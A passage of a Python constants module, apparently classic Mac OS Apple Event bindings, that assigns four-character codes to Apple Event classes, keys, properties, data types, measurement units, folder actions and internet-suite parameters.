cProperty = FOUR_CHAR_CODE('prop')
cQDPoint = FOUR_CHAR_CODE('QDpt')
cQDRectangle = FOUR_CHAR_CODE('qdrt')
cRectangle = FOUR_CHAR_CODE('crec')
cRGBColor = FOUR_CHAR_CODE('cRGB')
cRotation = FOUR_CHAR_CODE('trot')
cRoundedRectangle = FOUR_CHAR_CODE('crrc')
cRow = FOUR_CHAR_CODE('crow')
cSelection = FOUR_CHAR_CODE('csel')
cShortInteger = FOUR_CHAR_CODE('shor')
cTable = FOUR_CHAR_CODE('ctbl')
cText = FOUR_CHAR_CODE('ctxt')
cTextFlow = FOUR_CHAR_CODE('cflo')
cTextStyles = FOUR_CHAR_CODE('tsty')
cType = FOUR_CHAR_CODE('type')
cVersion = FOUR_CHAR_CODE('vers')
cWindow = FOUR_CHAR_CODE('cwin')
cWord = FOUR_CHAR_CODE('cwor')
enumArrows = FOUR_CHAR_CODE('arro')
enumJustification = FOUR_CHAR_CODE('just')
enumKeyForm = FOUR_CHAR_CODE('kfrm')
enumPosition = FOUR_CHAR_CODE('posi')
enumProtection = FOUR_CHAR_CODE('prtn')
enumQuality = FOUR_CHAR_CODE('qual')
enumSaveOptions = FOUR_CHAR_CODE('savo')
enumStyle = FOUR_CHAR_CODE('styl')
enumTransferMode = FOUR_CHAR_CODE('tran')
formUniqueID = FOUR_CHAR_CODE('ID ')
kAEAbout = FOUR_CHAR_CODE('abou')
kAEAfter = FOUR_CHAR_CODE('afte')
kAEAliasSelection = FOUR_CHAR_CODE('sali')
kAEAllCaps = FOUR_CHAR_CODE('alcp')
kAEArrowAtEnd = FOUR_CHAR_CODE('aren')
kAEArrowAtStart = FOUR_CHAR_CODE('arst')
kAEArrowBothEnds = FOUR_CHAR_CODE('arbo')
kAEAsk = FOUR_CHAR_CODE('ask ')
kAEBefore = FOUR_CHAR_CODE('befo')
kAEBeginning = FOUR_CHAR_CODE('bgng')
kAEBeginsWith = FOUR_CHAR_CODE('bgwt')
kAEBeginTransaction = FOUR_CHAR_CODE('begi')
kAEBold = FOUR_CHAR_CODE('bold')
kAECaseSensEquals = FOUR_CHAR_CODE('cseq')
kAECentered = FOUR_CHAR_CODE('cent')
kAEChangeView = FOUR_CHAR_CODE('view')
kAEClone = FOUR_CHAR_CODE('clon')
kAEClose = FOUR_CHAR_CODE('clos')
kAECondensed = FOUR_CHAR_CODE('cond')
kAEContains = FOUR_CHAR_CODE('cont')
kAECopy = FOUR_CHAR_CODE('copy')
kAECoreSuite = FOUR_CHAR_CODE('core')
kAECountElements = FOUR_CHAR_CODE('cnte')
kAECreateElement = FOUR_CHAR_CODE('crel')
kAECreatePublisher = FOUR_CHAR_CODE('cpub')
kAECut = FOUR_CHAR_CODE('cut ')
kAEDelete = FOUR_CHAR_CODE('delo')
kAEDoObjectsExist = FOUR_CHAR_CODE('doex')
kAEDoScript = FOUR_CHAR_CODE('dosc')
kAEDrag = FOUR_CHAR_CODE('drag')
kAEDuplicateSelection = FOUR_CHAR_CODE('sdup')
kAEEditGraphic = FOUR_CHAR_CODE('edit')
kAEEmptyTrash = FOUR_CHAR_CODE('empt')
kAEEnd = FOUR_CHAR_CODE('end ')
kAEEndsWith = FOUR_CHAR_CODE('ends')
kAEEndTransaction = FOUR_CHAR_CODE('endt')
kAEEquals = FOUR_CHAR_CODE('= ')
kAEExpanded = FOUR_CHAR_CODE('pexp')
kAEFast = FOUR_CHAR_CODE('fast')
kAEFinderEvents = FOUR_CHAR_CODE('FNDR')
kAEFormulaProtect = FOUR_CHAR_CODE('fpro')
kAEFullyJustified = FOUR_CHAR_CODE('full')
kAEGetClassInfo = FOUR_CHAR_CODE('qobj')
kAEGetData = FOUR_CHAR_CODE('getd')
kAEGetDataSize = FOUR_CHAR_CODE('dsiz')
kAEGetEventInfo = FOUR_CHAR_CODE('gtei')
kAEGetInfoSelection = FOUR_CHAR_CODE('sinf')
kAEGetPrivilegeSelection = FOUR_CHAR_CODE('sprv')
kAEGetSuiteInfo = FOUR_CHAR_CODE('gtsi')
kAEGreaterThan = FOUR_CHAR_CODE('> ')
kAEGreaterThanEquals = FOUR_CHAR_CODE('>= ')
kAEGrow = FOUR_CHAR_CODE('grow')
kAEHidden = FOUR_CHAR_CODE('hidn')
kAEHiQuality = FOUR_CHAR_CODE('hiqu')
kAEImageGraphic = FOUR_CHAR_CODE('imgr')
kAEIsUniform = FOUR_CHAR_CODE('isun')
kAEItalic = FOUR_CHAR_CODE('ital')
kAELeftJustified = FOUR_CHAR_CODE('left')
kAELessThan = FOUR_CHAR_CODE('< ')
kAELessThanEquals = FOUR_CHAR_CODE('<= ')
kAELowercase = FOUR_CHAR_CODE('lowc')
kAEMakeObjectsVisible = FOUR_CHAR_CODE('mvis')
kAEMiscStandards = FOUR_CHAR_CODE('misc')
kAEModifiable = FOUR_CHAR_CODE('modf')
kAEMove = FOUR_CHAR_CODE('move')
kAENo = FOUR_CHAR_CODE('no ')
kAENoArrow = FOUR_CHAR_CODE('arno')
kAENonmodifiable = FOUR_CHAR_CODE('nmod')
kAEOpen = FOUR_CHAR_CODE('odoc')
kAEOpenSelection = FOUR_CHAR_CODE('sope')
kAEOutline = FOUR_CHAR_CODE('outl')
kAEPageSetup = FOUR_CHAR_CODE('pgsu')
kAEPaste = FOUR_CHAR_CODE('past')
kAEPlain = FOUR_CHAR_CODE('plan')
kAEPrint = FOUR_CHAR_CODE('pdoc')
kAEPrintSelection = FOUR_CHAR_CODE('spri')
kAEPrintWindow = FOUR_CHAR_CODE('pwin')
kAEPutAwaySelection = FOUR_CHAR_CODE('sput')
kAEQDAddOver = FOUR_CHAR_CODE('addo')
kAEQDAddPin = FOUR_CHAR_CODE('addp')
kAEQDAdMax = FOUR_CHAR_CODE('admx')
kAEQDAdMin = FOUR_CHAR_CODE('admn')
kAEQDBic = FOUR_CHAR_CODE('bic ')
kAEQDBlend = FOUR_CHAR_CODE('blnd')
kAEQDCopy = FOUR_CHAR_CODE('cpy ')
kAEQDNotBic = FOUR_CHAR_CODE('nbic')
kAEQDNotCopy = FOUR_CHAR_CODE('ncpy')
kAEQDNotOr = FOUR_CHAR_CODE('ntor')
kAEQDNotXor = FOUR_CHAR_CODE('nxor')
kAEQDOr = FOUR_CHAR_CODE('or ')
kAEQDSubOver = FOUR_CHAR_CODE('subo')
kAEQDSubPin = FOUR_CHAR_CODE('subp')
kAEQDSupplementalSuite = FOUR_CHAR_CODE('qdsp')
kAEQDXor = FOUR_CHAR_CODE('xor ')
kAEQuickdrawSuite = FOUR_CHAR_CODE('qdrw')
kAEQuitAll = FOUR_CHAR_CODE('quia')
kAERedo = FOUR_CHAR_CODE('redo')
kAERegular = FOUR_CHAR_CODE('regl')
kAEReopenApplication = FOUR_CHAR_CODE('rapp')
kAEReplace = FOUR_CHAR_CODE('rplc')
kAERequiredSuite = FOUR_CHAR_CODE('reqd')
kAERestart = FOUR_CHAR_CODE('rest')
kAERevealSelection = FOUR_CHAR_CODE('srev')
kAERevert = FOUR_CHAR_CODE('rvrt')
kAERightJustified = FOUR_CHAR_CODE('rght')
kAESave = FOUR_CHAR_CODE('save')
kAESelect = FOUR_CHAR_CODE('slct')
kAESetData = FOUR_CHAR_CODE('setd')
kAESetPosition = FOUR_CHAR_CODE('posn')
kAEShadow = FOUR_CHAR_CODE('shad')
kAEShowClipboard = FOUR_CHAR_CODE('shcl')
kAEShutDown = FOUR_CHAR_CODE('shut')
kAESleep = FOUR_CHAR_CODE('slep')
kAESmallCaps = FOUR_CHAR_CODE('smcp')
kAESpecialClassProperties = FOUR_CHAR_CODE('c@#!')
kAEStrikethrough = FOUR_CHAR_CODE('strk')
kAESubscript = FOUR_CHAR_CODE('sbsc')
kAESuperscript = FOUR_CHAR_CODE('spsc')
kAETableSuite = FOUR_CHAR_CODE('tbls')
kAETextSuite = FOUR_CHAR_CODE('TEXT')
kAETransactionTerminated = FOUR_CHAR_CODE('ttrm')
kAEUnderline = FOUR_CHAR_CODE('undl')
kAEUndo = FOUR_CHAR_CODE('undo')
kAEWholeWordEquals = FOUR_CHAR_CODE('wweq')
kAEYes = FOUR_CHAR_CODE('yes ')
kAEZoom = FOUR_CHAR_CODE('zoom')
kAEMouseClass = FOUR_CHAR_CODE('mous')
kAEDown = FOUR_CHAR_CODE('down')
kAEUp = FOUR_CHAR_CODE('up ')
kAEMoved = FOUR_CHAR_CODE('move')
kAEStoppedMoving = FOUR_CHAR_CODE('stop')
kAEWindowClass = FOUR_CHAR_CODE('wind')
kAEUpdate = FOUR_CHAR_CODE('updt')
kAEActivate = FOUR_CHAR_CODE('actv')
kAEDeactivate = FOUR_CHAR_CODE('dact')
kAECommandClass = FOUR_CHAR_CODE('cmnd')
kAEKeyClass = FOUR_CHAR_CODE('keyc')
kAERawKey = FOUR_CHAR_CODE('rkey')
kAEVirtualKey = FOUR_CHAR_CODE('keyc')
kAENavigationKey = FOUR_CHAR_CODE('nave')
kAEAutoDown = FOUR_CHAR_CODE('auto')
kAEApplicationClass = FOUR_CHAR_CODE('appl')
kAESuspend = FOUR_CHAR_CODE('susp')
kAEResume = FOUR_CHAR_CODE('rsme')
kAEDiskEvent = FOUR_CHAR_CODE('disk')
kAENullEvent = FOUR_CHAR_CODE('null')
kAEWakeUpEvent = FOUR_CHAR_CODE('wake')
kAEScrapEvent = FOUR_CHAR_CODE('scrp')
kAEHighLevel = FOUR_CHAR_CODE('high')
keyAEAngle = FOUR_CHAR_CODE('kang')
keyAEArcAngle = FOUR_CHAR_CODE('parc')
keyAEBaseAddr = FOUR_CHAR_CODE('badd')
keyAEBestType = FOUR_CHAR_CODE('pbst')
keyAEBgndColor = FOUR_CHAR_CODE('kbcl')
keyAEBgndPattern = FOUR_CHAR_CODE('kbpt')
keyAEBounds = FOUR_CHAR_CODE('pbnd')
keyAECellList = FOUR_CHAR_CODE('kclt')
keyAEClassID = FOUR_CHAR_CODE('clID')
keyAEColor = FOUR_CHAR_CODE('colr')
keyAEColorTable = FOUR_CHAR_CODE('cltb')
keyAECurveHeight = FOUR_CHAR_CODE('kchd')
keyAECurveWidth = FOUR_CHAR_CODE('kcwd')
keyAEDashStyle = FOUR_CHAR_CODE('pdst')
keyAEData = FOUR_CHAR_CODE('data')
keyAEDefaultType = FOUR_CHAR_CODE('deft')
keyAEDefinitionRect = FOUR_CHAR_CODE('pdrt')
keyAEDescType = FOUR_CHAR_CODE('dstp')
keyAEDestination = FOUR_CHAR_CODE('dest')
keyAEDoAntiAlias = FOUR_CHAR_CODE('anta')
keyAEDoDithered = FOUR_CHAR_CODE('gdit')
keyAEDoRotate = FOUR_CHAR_CODE('kdrt')
keyAEDoScale = FOUR_CHAR_CODE('ksca')
keyAEDoTranslate = FOUR_CHAR_CODE('ktra')
keyAEEditionFileLoc = FOUR_CHAR_CODE('eloc')
keyAEElements = FOUR_CHAR_CODE('elms')
keyAEEndPoint = FOUR_CHAR_CODE('pend')
keyAEEventClass = FOUR_CHAR_CODE('evcl')
keyAEEventID = FOUR_CHAR_CODE('evti')
keyAEFile = FOUR_CHAR_CODE('kfil')
keyAEFileType = FOUR_CHAR_CODE('fltp')
keyAEFillColor = FOUR_CHAR_CODE('flcl')
keyAEFillPattern = FOUR_CHAR_CODE('flpt')
keyAEFlipHorizontal = FOUR_CHAR_CODE('kfho')
keyAEFlipVertical = FOUR_CHAR_CODE('kfvt')
keyAEFont = FOUR_CHAR_CODE('font')
keyAEFormula = FOUR_CHAR_CODE('pfor')
keyAEGraphicObjects = FOUR_CHAR_CODE('gobs')
keyAEID = FOUR_CHAR_CODE('ID ')
keyAEImageQuality = FOUR_CHAR_CODE('gqua')
keyAEInsertHere = FOUR_CHAR_CODE('insh')
keyAEKeyForms = FOUR_CHAR_CODE('keyf')
keyAEKeyword = FOUR_CHAR_CODE('kywd')
keyAELevel = FOUR_CHAR_CODE('levl')
keyAELineArrow = FOUR_CHAR_CODE('arro')
keyAEName = FOUR_CHAR_CODE('pnam')
keyAENewElementLoc = FOUR_CHAR_CODE('pnel')
keyAEObject = FOUR_CHAR_CODE('kobj')
keyAEObjectClass = FOUR_CHAR_CODE('kocl')
keyAEOffStyles = FOUR_CHAR_CODE('ofst')
keyAEOnStyles = FOUR_CHAR_CODE('onst')
keyAEParameters = FOUR_CHAR_CODE('prms')
keyAEParamFlags = FOUR_CHAR_CODE('pmfg')
keyAEPenColor = FOUR_CHAR_CODE('ppcl')
keyAEPenPattern = FOUR_CHAR_CODE('pppa')
keyAEPenWidth = FOUR_CHAR_CODE('ppwd')
keyAEPixelDepth = FOUR_CHAR_CODE('pdpt')
keyAEPixMapMinus = FOUR_CHAR_CODE('kpmm')
keyAEPMTable = FOUR_CHAR_CODE('kpmt')
keyAEPointList = FOUR_CHAR_CODE('ptlt')
keyAEPointSize = FOUR_CHAR_CODE('ptsz')
keyAEPosition = FOUR_CHAR_CODE('kpos')
keyAEPropData = FOUR_CHAR_CODE('prdt')
keyAEProperties = FOUR_CHAR_CODE('qpro')
keyAEProperty = FOUR_CHAR_CODE('kprp')
keyAEPropFlags = FOUR_CHAR_CODE('prfg')
keyAEPropID = FOUR_CHAR_CODE('prop')
keyAEProtection = FOUR_CHAR_CODE('ppro')
keyAERenderAs = FOUR_CHAR_CODE('kren')
keyAERequestedType = FOUR_CHAR_CODE('rtyp')
keyAEResult = FOUR_CHAR_CODE('----')
keyAEResultInfo = FOUR_CHAR_CODE('rsin')
keyAERotation = FOUR_CHAR_CODE('prot')
keyAERotPoint = FOUR_CHAR_CODE('krtp')
keyAERowList = FOUR_CHAR_CODE('krls')
keyAESaveOptions = FOUR_CHAR_CODE('savo')
keyAEScale = FOUR_CHAR_CODE('pscl')
keyAEScriptTag = FOUR_CHAR_CODE('psct')
keyAEShowWhere = FOUR_CHAR_CODE('show')
keyAEStartAngle = FOUR_CHAR_CODE('pang')
keyAEStartPoint = FOUR_CHAR_CODE('pstp')
keyAEStyles = FOUR_CHAR_CODE('ksty')
keyAESuiteID = FOUR_CHAR_CODE('suit')
keyAEText = FOUR_CHAR_CODE('ktxt')
keyAETextColor = FOUR_CHAR_CODE('ptxc')
keyAETextFont = FOUR_CHAR_CODE('ptxf')
keyAETextPointSize = FOUR_CHAR_CODE('ptps')
keyAETextStyles = FOUR_CHAR_CODE('txst')
keyAETextLineHeight = FOUR_CHAR_CODE('ktlh')
keyAETextLineAscent = FOUR_CHAR_CODE('ktas')
keyAETheText = FOUR_CHAR_CODE('thtx')
keyAETransferMode = FOUR_CHAR_CODE('pptm')
keyAETranslation = FOUR_CHAR_CODE('ptrs')
keyAETryAsStructGraf = FOUR_CHAR_CODE('toog')
keyAEUniformStyles = FOUR_CHAR_CODE('ustl')
keyAEUpdateOn = FOUR_CHAR_CODE('pupd')
keyAEUserTerm = FOUR_CHAR_CODE('utrm')
keyAEWindow = FOUR_CHAR_CODE('wndw')
keyAEWritingCode = FOUR_CHAR_CODE('wrcd')
keyMiscellaneous = FOUR_CHAR_CODE('fmsc')
keySelection = FOUR_CHAR_CODE('fsel')
keyWindow = FOUR_CHAR_CODE('kwnd')
keyWhen = FOUR_CHAR_CODE('when')
keyWhere = FOUR_CHAR_CODE('wher')
keyModifiers = FOUR_CHAR_CODE('mods')
keyKey = FOUR_CHAR_CODE('key ')
keyKeyCode = FOUR_CHAR_CODE('code')
keyKeyboard = FOUR_CHAR_CODE('keyb')
keyDriveNumber = FOUR_CHAR_CODE('drv#')
keyErrorCode = FOUR_CHAR_CODE('err#')
keyHighLevelClass = FOUR_CHAR_CODE('hcls')
keyHighLevelID = FOUR_CHAR_CODE('hid ')
pArcAngle = FOUR_CHAR_CODE('parc')
pBackgroundColor = FOUR_CHAR_CODE('pbcl')
pBackgroundPattern = FOUR_CHAR_CODE('pbpt')
pBestType = FOUR_CHAR_CODE('pbst')
pBounds = FOUR_CHAR_CODE('pbnd')
pClass = FOUR_CHAR_CODE('pcls')
pClipboard = FOUR_CHAR_CODE('pcli')
pColor = FOUR_CHAR_CODE('colr')
pColorTable = FOUR_CHAR_CODE('cltb')
pContents = FOUR_CHAR_CODE('pcnt')
pCornerCurveHeight = FOUR_CHAR_CODE('pchd')
pCornerCurveWidth = FOUR_CHAR_CODE('pcwd')
pDashStyle = FOUR_CHAR_CODE('pdst')
pDefaultType = FOUR_CHAR_CODE('deft')
pDefinitionRect = FOUR_CHAR_CODE('pdrt')
pEnabled = FOUR_CHAR_CODE('enbl')
pEndPoint = FOUR_CHAR_CODE('pend')
pFillColor = FOUR_CHAR_CODE('flcl')
pFillPattern = FOUR_CHAR_CODE('flpt')
pFont = FOUR_CHAR_CODE('font')
pFormula = FOUR_CHAR_CODE('pfor')
pGraphicObjects = FOUR_CHAR_CODE('gobs')
pHasCloseBox = FOUR_CHAR_CODE('hclb')
pHasTitleBar = FOUR_CHAR_CODE('ptit')
pID = FOUR_CHAR_CODE('ID ')
pIndex = FOUR_CHAR_CODE('pidx')
pInsertionLoc = FOUR_CHAR_CODE('pins')
pIsFloating = FOUR_CHAR_CODE('isfl')
pIsFrontProcess = FOUR_CHAR_CODE('pisf')
pIsModal = FOUR_CHAR_CODE('pmod')
pIsModified = FOUR_CHAR_CODE('imod')
pIsResizable = FOUR_CHAR_CODE('prsz')
pIsStationeryPad = FOUR_CHAR_CODE('pspd')
pIsZoomable = FOUR_CHAR_CODE('iszm')
pIsZoomed = FOUR_CHAR_CODE('pzum')
pItemNumber = FOUR_CHAR_CODE('itmn')
pJustification = FOUR_CHAR_CODE('pjst')
pLineArrow = FOUR_CHAR_CODE('arro')
pMenuID = FOUR_CHAR_CODE('mnid')
pName = FOUR_CHAR_CODE('pnam')
pNewElementLoc = FOUR_CHAR_CODE('pnel')
pPenColor = FOUR_CHAR_CODE('ppcl')
pPenPattern = FOUR_CHAR_CODE('pppa')
pPenWidth = FOUR_CHAR_CODE('ppwd')
pPixelDepth = FOUR_CHAR_CODE('pdpt')
pPointList = FOUR_CHAR_CODE('ptlt')
pPointSize = FOUR_CHAR_CODE('ptsz')
pProtection = FOUR_CHAR_CODE('ppro')
pRotation = FOUR_CHAR_CODE('prot')
pScale = FOUR_CHAR_CODE('pscl')
pScript = FOUR_CHAR_CODE('scpt')
pScriptTag = FOUR_CHAR_CODE('psct')
pSelected = FOUR_CHAR_CODE('selc')
pSelection = FOUR_CHAR_CODE('sele')
pStartAngle = FOUR_CHAR_CODE('pang')
pStartPoint = FOUR_CHAR_CODE('pstp')
pTextColor = FOUR_CHAR_CODE('ptxc')
pTextFont = FOUR_CHAR_CODE('ptxf')
pTextItemDelimiters = FOUR_CHAR_CODE('txdl')
pTextPointSize = FOUR_CHAR_CODE('ptps')
pTextStyles = FOUR_CHAR_CODE('txst')
pTransferMode = FOUR_CHAR_CODE('pptm')
pTranslation = FOUR_CHAR_CODE('ptrs')
pUniformStyles = FOUR_CHAR_CODE('ustl')
pUpdateOn = FOUR_CHAR_CODE('pupd')
pUserSelection = FOUR_CHAR_CODE('pusl')
pVersion = FOUR_CHAR_CODE('vers')
pVisible = FOUR_CHAR_CODE('pvis')
typeAEText = FOUR_CHAR_CODE('tTXT')
typeArc = FOUR_CHAR_CODE('carc')
typeBest = FOUR_CHAR_CODE('best')
typeCell = FOUR_CHAR_CODE('ccel')
typeClassInfo = FOUR_CHAR_CODE('gcli')
typeColorTable = FOUR_CHAR_CODE('clrt')
typeColumn = FOUR_CHAR_CODE('ccol')
typeDashStyle = FOUR_CHAR_CODE('tdas')
typeData = FOUR_CHAR_CODE('tdta')
typeDrawingArea = FOUR_CHAR_CODE('cdrw')
typeElemInfo = FOUR_CHAR_CODE('elin')
typeEnumeration = FOUR_CHAR_CODE('enum')
typeEPS = FOUR_CHAR_CODE('EPS ')
typeEventInfo = FOUR_CHAR_CODE('evin')
typeFinderWindow = FOUR_CHAR_CODE('fwin')
typeFixedPoint = FOUR_CHAR_CODE('fpnt')
typeFixedRectangle = FOUR_CHAR_CODE('frct')
typeGraphicLine = FOUR_CHAR_CODE('glin')
typeGraphicText = FOUR_CHAR_CODE('cgtx')
typeGroupedGraphic = FOUR_CHAR_CODE('cpic')
typeInsertionLoc = FOUR_CHAR_CODE('insl')
typeIntlText = FOUR_CHAR_CODE('itxt')
typeIntlWritingCode = FOUR_CHAR_CODE('intl')
typeLongDateTime = FOUR_CHAR_CODE('ldt ')
typeLongFixed = FOUR_CHAR_CODE('lfxd')
typeLongFixedPoint = FOUR_CHAR_CODE('lfpt')
typeLongFixedRectangle = FOUR_CHAR_CODE('lfrc')
typeLongPoint = FOUR_CHAR_CODE('lpnt')
typeLongRectangle = FOUR_CHAR_CODE('lrct')
typeMachineLoc = FOUR_CHAR_CODE('mLoc')
typeOval = FOUR_CHAR_CODE('covl')
typeParamInfo = FOUR_CHAR_CODE('pmin')
typePict = FOUR_CHAR_CODE('PICT')
typePixelMap = FOUR_CHAR_CODE('cpix')
typePixMapMinus = FOUR_CHAR_CODE('tpmm')
typePolygon = FOUR_CHAR_CODE('cpgn')
typePropInfo = FOUR_CHAR_CODE('pinf')
typePtr = FOUR_CHAR_CODE('ptr ')
typeQDPoint = FOUR_CHAR_CODE('QDpt')
typeQDRegion = FOUR_CHAR_CODE('Qrgn')
typeRectangle = FOUR_CHAR_CODE('crec')
typeRGB16 = FOUR_CHAR_CODE('tr16')
typeRGB96 = FOUR_CHAR_CODE('tr96')
typeRGBColor = FOUR_CHAR_CODE('cRGB')
typeRotation = FOUR_CHAR_CODE('trot')
typeRoundedRectangle = FOUR_CHAR_CODE('crrc')
typeRow = FOUR_CHAR_CODE('crow')
typeScrapStyles = FOUR_CHAR_CODE('styl')
typeScript = FOUR_CHAR_CODE('scpt')
typeStyledText = FOUR_CHAR_CODE('STXT')
typeSuiteInfo = FOUR_CHAR_CODE('suin')
typeTable = FOUR_CHAR_CODE('ctbl')
typeTextStyles = FOUR_CHAR_CODE('tsty')
typeTIFF = FOUR_CHAR_CODE('TIFF')
typeVersion = FOUR_CHAR_CODE('vers')
kAEMenuClass = FOUR_CHAR_CODE('menu')
kAEMenuSelect = FOUR_CHAR_CODE('mhit')
kAEMouseDown = FOUR_CHAR_CODE('mdwn')
kAEMouseDownInBack = FOUR_CHAR_CODE('mdbk')
kAEKeyDown = FOUR_CHAR_CODE('kdwn')
kAEResized = FOUR_CHAR_CODE('rsiz')
kAEPromise = FOUR_CHAR_CODE('prom')
keyMenuID = FOUR_CHAR_CODE('mid ')
keyMenuItem = FOUR_CHAR_CODE('mitm')
keyCloseAllWindows = FOUR_CHAR_CODE('caw ')
keyOriginalBounds = FOUR_CHAR_CODE('obnd')
keyNewBounds = FOUR_CHAR_CODE('nbnd')
keyLocalWhere = FOUR_CHAR_CODE('lwhr')
typeHIMenu = FOUR_CHAR_CODE('mobj')
typeHIWindow = FOUR_CHAR_CODE('wobj')
kBySmallIcon = 0
kByIconView = 1
kByNameView = 2
kByDateView = 3
kBySizeView = 4
kByKindView = 5
kByCommentView = 6
kByLabelView = 7
kByVersionView = 8
kAEInfo = 11
kAEMain = 0
kAESharing = 13
kAEZoomIn = 7
kAEZoomOut = 8
kTextServiceClass = FOUR_CHAR_CODE('tsvc')
kUpdateActiveInputArea = FOUR_CHAR_CODE('updt')
kShowHideInputWindow = FOUR_CHAR_CODE('shiw')
kPos2Offset = FOUR_CHAR_CODE('p2st')
kOffset2Pos = FOUR_CHAR_CODE('st2p')
kUnicodeNotFromInputMethod = FOUR_CHAR_CODE('unim')
kGetSelectedText = FOUR_CHAR_CODE('gtxt')
keyAETSMDocumentRefcon = FOUR_CHAR_CODE('refc')
keyAEServerInstance = FOUR_CHAR_CODE('srvi')
keyAETheData = FOUR_CHAR_CODE('kdat')
keyAEFixLength = FOUR_CHAR_CODE('fixl')
keyAEUpdateRange = FOUR_CHAR_CODE('udng')
keyAECurrentPoint = FOUR_CHAR_CODE('cpos')
keyAEBufferSize = FOUR_CHAR_CODE('buff')
keyAEMoveView = FOUR_CHAR_CODE('mvvw')
keyAENextBody = FOUR_CHAR_CODE('nxbd')
keyAETSMScriptTag = FOUR_CHAR_CODE('sclg')
keyAETSMTextFont = FOUR_CHAR_CODE('ktxf')
keyAETSMTextFMFont = FOUR_CHAR_CODE('ktxm')
keyAETSMTextPointSize = FOUR_CHAR_CODE('ktps')
keyAETSMEventRecord = FOUR_CHAR_CODE('tevt')
keyAETSMEventRef = FOUR_CHAR_CODE('tevr')
keyAETextServiceEncoding = FOUR_CHAR_CODE('tsen')
keyAETextServiceMacEncoding = FOUR_CHAR_CODE('tmen')
typeTextRange = FOUR_CHAR_CODE('txrn')
typeComponentInstance = FOUR_CHAR_CODE('cmpi')
typeOffsetArray = FOUR_CHAR_CODE('ofay')
typeTextRangeArray = FOUR_CHAR_CODE('tray')
typeLowLevelEventRecord = FOUR_CHAR_CODE('evtr')
typeEventRef = FOUR_CHAR_CODE('evrf')
typeText = typeChar
kTSMOutsideOfBody = 1
kTSMInsideOfBody = 2
kTSMInsideOfActiveInputArea = 3
kNextBody = 1
kPreviousBody = 2
kCaretPosition = 1
kRawText = 2
kSelectedRawText = 3
kConvertedText = 4
kSelectedConvertedText = 5
kBlockFillText = 6
kOutlineText = 7
kSelectedText = 8
keyAEHiliteRange = FOUR_CHAR_CODE('hrng')
keyAEPinRange = FOUR_CHAR_CODE('pnrg')
keyAEClauseOffsets = FOUR_CHAR_CODE('clau')
keyAEOffset = FOUR_CHAR_CODE('ofst')
keyAEPoint = FOUR_CHAR_CODE('gpos')
keyAELeftSide = FOUR_CHAR_CODE('klef')
keyAERegionClass = FOUR_CHAR_CODE('rgnc')
keyAEDragging = FOUR_CHAR_CODE('bool')
keyAELeadingEdge = keyAELeftSide
typeUnicodeText = FOUR_CHAR_CODE('utxt')
typeStyledUnicodeText = FOUR_CHAR_CODE('sutx')
typeEncodedString = FOUR_CHAR_CODE('encs')
typeCString = FOUR_CHAR_CODE('cstr')
typePString = FOUR_CHAR_CODE('pstr')
typeMeters = FOUR_CHAR_CODE('metr')
typeInches = FOUR_CHAR_CODE('inch')
typeFeet = FOUR_CHAR_CODE('feet')
typeYards = FOUR_CHAR_CODE('yard')
typeMiles = FOUR_CHAR_CODE('mile')
typeKilometers = FOUR_CHAR_CODE('kmtr')
typeCentimeters = FOUR_CHAR_CODE('cmtr')
typeSquareMeters = FOUR_CHAR_CODE('sqrm')
typeSquareFeet = FOUR_CHAR_CODE('sqft')
typeSquareYards = FOUR_CHAR_CODE('sqyd')
typeSquareMiles = FOUR_CHAR_CODE('sqmi')
typeSquareKilometers = FOUR_CHAR_CODE('sqkm')
typeLiters = FOUR_CHAR_CODE('litr')
typeQuarts = FOUR_CHAR_CODE('qrts')
typeGallons = FOUR_CHAR_CODE('galn')
typeCubicMeters = FOUR_CHAR_CODE('cmet')
typeCubicFeet = FOUR_CHAR_CODE('cfet')
typeCubicInches = FOUR_CHAR_CODE('cuin')
typeCubicCentimeter = FOUR_CHAR_CODE('ccmt')
typeCubicYards = FOUR_CHAR_CODE('cyrd')
typeKilograms = FOUR_CHAR_CODE('kgrm')
typeGrams = FOUR_CHAR_CODE('gram')
typeOunces = FOUR_CHAR_CODE('ozs ')
typePounds = FOUR_CHAR_CODE('lbs ')
typeDegreesC = FOUR_CHAR_CODE('degc')
typeDegreesF = FOUR_CHAR_CODE('degf')
typeDegreesK = FOUR_CHAR_CODE('degk')
kFAServerApp = FOUR_CHAR_CODE('ssrv')
kDoFolderActionEvent = FOUR_CHAR_CODE('fola')
kFolderActionCode = FOUR_CHAR_CODE('actn')
kFolderOpenedEvent = FOUR_CHAR_CODE('fopn')
kFolderClosedEvent = FOUR_CHAR_CODE('fclo')
kFolderWindowMovedEvent = FOUR_CHAR_CODE('fsiz')
kFolderItemsAddedEvent = FOUR_CHAR_CODE('fget')
kFolderItemsRemovedEvent = FOUR_CHAR_CODE('flos')
kItemList = FOUR_CHAR_CODE('flst')
kNewSizeParameter = FOUR_CHAR_CODE('fnsz')
kFASuiteCode = FOUR_CHAR_CODE('faco')
kFAAttachCommand = FOUR_CHAR_CODE('atfa')
kFARemoveCommand = FOUR_CHAR_CODE('rmfa')
kFAEditCommand = FOUR_CHAR_CODE('edfa')
kFAFileParam = FOUR_CHAR_CODE('faal')
kFAIndexParam = FOUR_CHAR_CODE('indx')
kAEInternetSuite = FOUR_CHAR_CODE('gurl')
kAEISWebStarSuite = FOUR_CHAR_CODE('WWW\xbd')
kAEISGetURL = FOUR_CHAR_CODE('gurl')
KAEISHandleCGI = FOUR_CHAR_CODE('sdoc')
cURL = FOUR_CHAR_CODE('url ')
cInternetAddress = FOUR_CHAR_CODE('IPAD')
cHTML = FOUR_CHAR_CODE('html')
cFTPItem = FOUR_CHAR_CODE('ftp ')
kAEISHTTPSearchArgs = FOUR_CHAR_CODE('kfor')
kAEISPostArgs = FOUR_CHAR_CODE('post')
kAEISMethod = FOUR_CHAR_CODE('meth')
kAEISClientAddress = FOUR_CHAR_CODE('addr')
kAEISUserName = FOUR_CHAR_CODE('user')
kAEISPassword = FOUR_CHAR_CODE('pass')
kAEISFromUser = FOUR_CHAR_CODE('frmu')
kAEISServerName = FOUR_CHAR_CODE('svnm')
kAEISServerPort = FOUR_CHAR_CODE('svpt')
kAEISScriptName = FOUR_CHAR_CODE('scnm')
kAEISContentType = FOUR_CHAR_CODE('ctyp')
kAEISReferrer = FOUR_CHAR_CODE('refr')
kAEISUserAgent = FOUR_CHAR_CODE('Agnt')
kAEISAction = FOUR_CHAR_CODE('Kact')
kAEISActionPath = FOUR_CHAR_CODE('Kapt')
kAEISClientIP = FOUR_CHAR_CODE('Kcip')
kAEISFullRequest = FOUR_CHAR_CODE('Kfrq')
pScheme = FOUR_CHAR_CODE('pusc')
pHost = FOUR_CHAR_CODE('HOST')
